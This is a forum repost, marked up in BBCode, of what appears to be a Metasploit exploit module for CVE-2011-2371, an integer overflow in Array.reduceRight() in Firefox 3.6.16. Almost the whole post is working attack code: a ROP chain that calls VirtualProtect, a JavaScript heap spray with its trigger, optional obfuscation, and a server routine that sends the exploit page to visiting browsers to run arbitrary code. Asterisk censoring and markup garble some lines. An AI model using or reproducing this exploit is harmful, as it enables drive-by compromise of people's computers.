Kod:
[COLOR=#008200]## [/COLOR][COLOR=#008200]# $Id: mozilla_reduceright.rb 13909 2011-10-13 03:16:15Z sinn3r $ [/COLOR]
[COLOR=#008200]## [/COLOR]
[COLOR=#008200]## [/COLOR]
[COLOR=#008200]# This file is part of the ****sploit Framework and may be subject to [/COLOR]
[COLOR=#008200]# redistribution and commercial restrictions. Please see the ****sploit [/COLOR]
[COLOR=#008200]# Framework web site for more information on licensing and terms of use. [/COLOR]
[COLOR=#008200]# http://****sploit.com/framework/ [/COLOR]
[COLOR=#008200]## [/COLOR]
require [COLOR=#0000ff]'msf/core'[/COLOR]
[B][COLOR=#006699]class[/COLOR][/B] ****sploit3 < Msf::Exploit::Remote
Rank = AverageRanking
include Msf::Exploit::Remote::HttpServer::[COLOR=#0066cc]HTML[/COLOR]
[B][COLOR=#006699]def[/COLOR][/B] initialize(info={})
[B][COLOR=#006699]super[/COLOR][/B](update_info(info,
[COLOR=#0000ff]'Name'[/COLOR] => [COLOR=#0000ff]"Mozilla Firefox Array.reduceRight() Integer Overflow"[/COLOR],
[COLOR=#0000ff]'Description'[/COLOR] => %q{
This [B][COLOR=#006699]module[/COLOR][/B] exploits a vulnerability found [B][COLOR=#006699]in[/COLOR][/B] Mozilla Firefox [COLOR=#0066cc]3[/COLOR].[COLOR=#0066cc]6[/COLOR]. When an
array object is configured with a large length value, the reduceRight() method
may cause an invalid index being used, allowing abitrary remote code execution.
Please note that the exploit requires a longer amount of time (compare to a
typical browser exploit) [B][COLOR=#006699]in[/COLOR][/B] order to gain control of the machine.
},
[COLOR=#0000ff]'License'[/COLOR] => [COLOR=#0066cc]MSF_LICENSE[/COLOR],
[COLOR=#0000ff]'Version'[/COLOR] => [COLOR=#0000ff]"$Revision: 13909 $"[/COLOR],
[COLOR=#0000ff]'Author'[/COLOR] =>
[
[COLOR=#0000ff]'Chris Rohlf'[/COLOR], [COLOR=#008200]#Matasano Security (Initial discovery according to Mozilla.org) [/COLOR]
[COLOR=#0000ff]'Yan Ivnitskiy'[/COLOR], [COLOR=#008200]#Matasano Security (Initial discovery with Chris?) [/COLOR]
[COLOR=#0000ff]'Matteo Memelli'[/COLOR], [COLOR=#008200]#PoC from Exploit-DB [/COLOR]
[COLOR=#0000ff]'dookie2000ca'[/COLOR], [COLOR=#008200]#"Helping" ryujin (Matteo) [/COLOR]
[COLOR=#0000ff]'sinn3r'[/COLOR], [COLOR=#008200]#****sploit [/COLOR]
],
[COLOR=#0000ff]'References'[/COLOR] =>
[
[[COLOR=#0000ff]'CVE'[/COLOR], [COLOR=#0000ff]'2011-2371'[/COLOR]],
[[COLOR=#0000ff]'URL'[/COLOR], [COLOR=#0000ff]'http://http://www.exploit-db.com/exploits/17974/'[/COLOR]],
[[COLOR=#0000ff]'URL'[/COLOR], [COLOR=#0000ff]'https://bugzilla.mozilla.org/show_bug.cgi?id=664009'[/COLOR]]
],
[COLOR=#0000ff]'Payload'[/COLOR] =>
{
[COLOR=#0000ff]'BadChars'[/COLOR] => [COLOR=#0000ff]"\x00"[/COLOR],
[COLOR=#0000ff]'PrependEncoder'[/COLOR] => [COLOR=#0000ff]"\xbc\x0c\x0c\x0c\x0c"[/COLOR],
},
[COLOR=#0000ff]'DefaultOptions'[/COLOR] =>
{
[COLOR=#0000ff]'ExitFunction'[/COLOR] => [COLOR=#0000ff]"process"[/COLOR],
[COLOR=#0000ff]'InitialAutoRunScript'[/COLOR] => [COLOR=#0000ff]'migrate -f'[/COLOR],
},
[COLOR=#0000ff]'Platform'[/COLOR] => [COLOR=#0000ff]'win'[/COLOR],
[COLOR=#0000ff]'Targets'[/COLOR] =>
[
[COLOR=#008200]#Windows XP / Vista / 7 [/COLOR]
[ [COLOR=#0000ff]'Mozilla Firefox 3.6.16'[/COLOR], {} ],
],
[COLOR=#0000ff]'Privileged'[/COLOR] => [B][COLOR=#006699]false[/COLOR][/B],
[COLOR=#0000ff]'DisclosureDate'[/COLOR] => [COLOR=#0000ff]"Jun 21 2011"[/COLOR],
[COLOR=#0000ff]'DefaultTarget'[/COLOR] => [COLOR=#0066cc]0[/COLOR]
))
register_options(
[
OptBool.[B][COLOR=#006699]new[/COLOR][/B]([COLOR=#0000ff]'OBFUSCATE'[/COLOR], [[B][COLOR=#006699]false[/COLOR][/B], [COLOR=#0000ff]'Enable JavaScript obfuscation'[/COLOR]])
], [B][COLOR=#006699]self[/COLOR][/B].[B][COLOR=#006699]class[/COLOR][/B])
[B][COLOR=#006699]end[/COLOR][/B]
[B][COLOR=#006699]def[/COLOR][/B] junk
[B][COLOR=#006699]return[/COLOR][/B] rand_text_alpha([COLOR=#0066cc]4[/COLOR]).unpack([COLOR=#0000ff]"L"[/COLOR])[[COLOR=#0066cc]0[/COLOR]].to_i
[B][COLOR=#006699]end[/COLOR][/B]
[B][COLOR=#006699]def[/COLOR][/B] on_request_uri(cli, request)
agent = request.headers[[COLOR=#0000ff]'User-Agent'[/COLOR]]
[B][COLOR=#006699]if[/COLOR][/B] agent !~ /Firefox\/[COLOR=#0066cc]3[/COLOR]\.[COLOR=#0066cc]6[/COLOR]\.[[COLOR=#0066cc]16[/COLOR]|[COLOR=#0066cc]17[/COLOR]]/
vprint_error([COLOR=#0000ff]"This browser is not supported: #{agent.to_s}"[/COLOR])
send_not_found(cli)
[B][COLOR=#006699]return[/COLOR][/B]
[B][COLOR=#006699]end[/COLOR][/B]
[COLOR=#008200]#mona.py tekniq! + Payload [/COLOR]
rop = [
0x7c346c0a, [COLOR=#008200]# POP EAX # RETN (MSVCR71.dll) [/COLOR]
0x7c37a140, [COLOR=#008200]# Make EAX readable [/COLOR]
0x7c37591f, [COLOR=#008200]# PUSH ESP # ... # POP ECX # POP EBP # RETN (MSVCR71.dll) [/COLOR]
0x7c348b06, [COLOR=#008200]# EBP (NOP) [/COLOR]
0x7c346c0a, [COLOR=#008200]# POP EAX # RETN (MSVCR71.dll) [/COLOR]
0x7c37a140, [COLOR=#008200]# <- VirtualProtect() found in IAT [/COLOR]
0x7c3530ea, [COLOR=#008200]# MOV EAX,DWORD PTR DS:[EAX] # RETN (MSVCR71.dll) [/COLOR]
0x7c346c0b, [COLOR=#008200]# Slide, so next gadget would write to correct stack ******** [/COLOR]
0x7c376069, [COLOR=#008200]# MOV [ECX+1C],EAX # P EDI # P ESI # P EBX # RETN (MSVCR71.dll) [/COLOR]
0x7c348b06, [COLOR=#008200]# EDI (filler) [/COLOR]
0x7c348b06, [COLOR=#008200]# will be patched at runtime (VP), then picked up into ESI [/COLOR]
0x7c348b06, [COLOR=#008200]# EBX (filler) [/COLOR]
0x7c376402, [COLOR=#008200]# POP EBP # RETN (msvcr71.dll) [/COLOR]
0x7c345c30, [COLOR=#008200]# ptr to push esp # ret (from MSVCR71.dll) [/COLOR]
0x7c346c0a, [COLOR=#008200]# POP EAX # RETN (MSVCR71.dll) [/COLOR]
0xfffff82f, [COLOR=#008200]# size 20001 bytes [/COLOR]
0x7c351e05, [COLOR=#008200]# NEG EAX # RETN (MSVCR71.dll) [/COLOR]
0x7c354901, [COLOR=#008200]# POP EBX # RETN (MSVCR71.dll) [/COLOR]
0xffffffff, [COLOR=#008200]# pop value into ebx [/COLOR]
0x7c345255, [COLOR=#008200]# INC EBX # FPATAN # RETN (MSVCR71.dll) [/COLOR]
0x7c352174, [COLOR=#008200]# ADD EBX,EAX # XOR EAX,EAX # INC EAX # RETN (MSVCR71.dll) [/COLOR]
0x7c34d201, [COLOR=#008200]# POP ECX # RETN (MSVCR71.dll) [/COLOR]
0x7c38b001, [COLOR=#008200]# RW pointer (lpOldProtect) (-> ecx) [/COLOR]
0x7c34b8d7, [COLOR=#008200]# POP EDI # RETN (MSVCR71.dll) [/COLOR]
0x7c34b8d8, [COLOR=#008200]# ROP NOP (-> edi) [/COLOR]
0x7c344f87, [COLOR=#008200]# POP EDX # RETN (MSVCR71.dll) [/COLOR]
0xffffffc0, [COLOR=#008200]# value to negate, target value : 0x00000040, target: edx [/COLOR]
0x7c351eb1, [COLOR=#008200]# NEG EDX # RETN (MSVCR71.dll) [/COLOR]
0x7c346c0a, [COLOR=#008200]# POP EAX # RETN (MSVCR71.dll) [/COLOR]
0x90909090, [COLOR=#008200]# NOPS (-> eax) [/COLOR]
0x7c378c81, [COLOR=#008200]# PUSHAD # ADD AL,0EF # RETN (MSVCR71.dll) [/COLOR]
].pack([COLOR=#0000ff]'V*'[/COLOR])
table = [0x4141].pack([COLOR=#0000ff]'v*'[/COLOR])
table << [
0x0c000048,
junk,
junk,
junk,
junk,
junk,
junk,
junk,
junk,
].pack([COLOR=#0000ff]'V*'[/COLOR])
table << [0x4141].pack([COLOR=#0000ff]'v*'[/COLOR])
table << [
0x7c370eef,
junk,
].pack([COLOR=#0000ff]'V*'[/COLOR])
table << [0x4141].pack([COLOR=#0000ff]'v*'[/COLOR])
table << [
0x3410240c,
0x0c00007c,
junk,
junk,
junk,
junk,
junk,
junk,
junk,
junk,
junk,
junk,
junk,
junk,
0x0c00002e
].pack([COLOR=#0000ff]'V*'[/COLOR])
p = payload.encoded
arch = Rex::Arch.endian(target.arch)
js_payload = Rex::Text.to_unescape(rop + p, arch)
js_ptrs = Rex::Text.to_unescape(table, arch)
[COLOR=#008200]#Pretty much based on Matteo's code except for the size adjustment to a**** a busted heap [/COLOR]
js = <<-[COLOR=#0066cc]JS[/COLOR]
var applet = ********.getElementById([COLOR=#0000ff]'MyApplet'[/COLOR]);
function spray() {
var ptrs = unescape([COLOR=#0000ff]"#{js_ptrs}"[/COLOR]);
var bheader = 0x12/[COLOR=#0066cc]2[/COLOR];
var nullt = 0x2/[COLOR=#0066cc]2[/COLOR];
var espoffset = ([COLOR=#0066cc]7340[/COLOR] /[COLOR=#0066cc]2[/COLOR]) - ptrs.length;
var esppadding = unescape([COLOR=#0000ff]"%u0c0c%u0c0c"[/COLOR]);
[B][COLOR=#006699]while[/COLOR][/B](esppadding.length < espoffset) esppadding += esppadding;
esppadding = esppadding.substring([COLOR=#0066cc]0[/COLOR], espoffset);
var payload = unescape([COLOR=#0000ff]"#{js_payload}"[/COLOR]);
var tr_padding = unescape([COLOR=#0000ff]"%u0c0c%u0c0c"[/COLOR]);
[B][COLOR=#006699]while[/COLOR][/B] (tr_padding.length < 0x7fa00) {tr_padding += tr_padding;}
var dummy = ptrs + esppadding + payload + tr_padding;
var hspray = dummy.substring([COLOR=#0066cc]0[/COLOR],0x7fa00 - bheader - nullt);
HeapBlocks = [B][COLOR=#006699]new[/COLOR][/B] [COLOR=#808080]Array[/COLOR]()
[B][COLOR=#006699]for[/COLOR][/B] (i=[COLOR=#0066cc]0[/COLOR];i<0x60;i++){
HeapBlocks[i] += hspray;
}
}
spray();
obj = [B][COLOR=#006699]new[/COLOR][/B] [COLOR=#808080]Array[/COLOR];
obj.length = [COLOR=#0066cc]2197815302[/COLOR];
f = function trigger(prev, myobj, indx, array) {
alert(myobj[[COLOR=#0066cc]0[/COLOR]]);
}
obj.reduceRight(f,[COLOR=#0066cc]1[/COLOR],[COLOR=#0066cc]2[/COLOR],[COLOR=#0066cc]3[/COLOR]);
[COLOR=#0066cc]JS[/COLOR]
js = js.gsub(/^\t\t/, [COLOR=#0000ff]''[/COLOR])
[B][COLOR=#006699]if[/COLOR][/B] datastore[[COLOR=#0000ff]'OBFUSCATE'[/COLOR]]
js = ::Rex::Exploitation::JSObfu.[B][COLOR=#006699]new[/COLOR][/B](js)
js.obfuscate
[B][COLOR=#006699]end[/COLOR][/B]
html = <<-[COLOR=#0066cc]HTML[/COLOR]
<html>
<head>
</head>
<body>
<[COLOR=#0066cc]APPLET[/COLOR] id=[COLOR=#0000ff]"MyApplet"[/COLOR] code=[COLOR=#0000ff]"trigger.class"[/COLOR] width=[COLOR=#0066cc]150[/COLOR] height=[COLOR=#0066cc]50[/COLOR]>
You need a Java-enabled browser to pwn this.
</[COLOR=#0066cc]APPLET[/COLOR]>
**********
[COLOR=#008200]#{js} [/COLOR]
</script>
</body>
<html>
[COLOR=#0066cc]HTML[/COLOR]
print_status([COLOR=#0000ff]"Sending exploit to #{cli.peerhost}:#{cli.peerport}..."[/COLOR])
send_response(cli, html, {[COLOR=#0000ff]'Content-Type'[/COLOR]=>[COLOR=#0000ff]'text/html'[/COLOR]})
[COLOR=#006699][B]end[/B][/COLOR]
[B][COLOR=#006699]end[/COLOR][/B]
